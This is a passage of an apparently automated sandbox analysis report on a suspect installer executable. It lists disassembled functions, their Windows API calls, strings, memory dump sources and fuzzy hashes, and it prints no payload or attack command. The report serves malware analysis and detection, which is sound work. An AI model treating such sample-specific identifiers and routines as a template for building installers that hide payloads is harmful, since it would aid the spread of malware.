                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: :A@$Call$N
                                                                                                                                                                                    • API String ID: 3103080414-988963664
                                                                                                                                                                                    • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                                                                                                                                                                                    Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextA.USER32(00000000,benevolently Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F$benevolently Setup
                                                                                                                                                                                    • API String ID: 941294808-4072580303
                                                                                                                                                                                    • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                                                                                                                                                    • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                                                                                                                                                                    Function 00405BD4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
                                                                                                                                                                                      • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                                                                                                                                                                      • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00405C49
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405D32
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                                                                                                                                                                                      • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
                                                                                                                                                                                      • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                                                                                                    • Opcode ID: f2ec23aa19f738889096a3ad1bd3946321de2aef01a06aa8690d73ef80469bf6
                                                                                                                                                                                    • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ec23aa19f738889096a3ad1bd3946321de2aef01a06aa8690d73ef80469bf6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
                                                                                                                                                                                    Function 004061CF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                                                                                                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                                                                                                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                                                                                                                                                                                    • CharPrevA.USER32(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • *?|<>/":, xrefs: 00406217
                                                                                                                                                                                    • "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 0040620B
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004061D0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 589700163-966308650
                                                                                                                                                                                    • Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                                                                                                                                                                                    • Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
                                                                                                                                                                                    Function 0040408D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004040AA
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004040C6
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004040D2
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004040DE
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004040F1
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404101
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040411B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404125
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                    • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                                                                                                                                                                                    Function 100023D8 Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 100024B3
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100024ED
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                                                    • Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                    • Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
                                                                                                                                                                                    Function 00404957 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040497A
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404994
                                                                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                                                                                                                                                                                    Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                    • MulDiv.KERNEL32(00046D47,00000064,000476F0), ref: 00402CA7
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00402CB7
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402CB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                                                                                                                                                                                    Function 100021FA Relevance: 9.1, APIs: 6, Instructions: 137memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002348
                                                                                                                                                                                      • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                                                                                                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100022FE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3730416702-0
                                                                                                                                                                                    • Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                    • Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                    • Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61
                                                                                                                                                                                    Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                                                                                                                                                                    • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                                                                                                                                                                                    Function 0040484D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(benevolently Setup: Installing,benevolently Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004048F3
